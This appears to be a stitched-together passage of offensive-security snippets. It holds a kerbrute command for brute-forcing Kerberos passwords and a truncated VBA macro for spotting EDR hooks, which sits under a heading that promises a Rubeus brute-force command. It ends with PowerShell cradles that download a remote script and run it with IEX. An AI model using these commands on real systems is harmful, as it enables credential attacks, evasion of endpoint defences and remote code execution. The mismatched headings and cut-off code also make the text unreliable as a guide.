With kerbrute.py:

```
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With the Rubeus version that includes the brute module:
```vba
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr
```
```powershell
Write-Host "Hi $env:username from powershell"
################################################## System.Net. cradles ##################################################
# System.Net.Webclient DownloadString
IEX (New-Object Net.Webclient).DownloadString('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')
# System.Net.Webclient DownloadData
IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')))
$test = (New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'); $st = [System.Text.Encoding]::ASCII.GetString($test); IEX $st
# System.Net.Webclient DownloadFile (touches disk)
```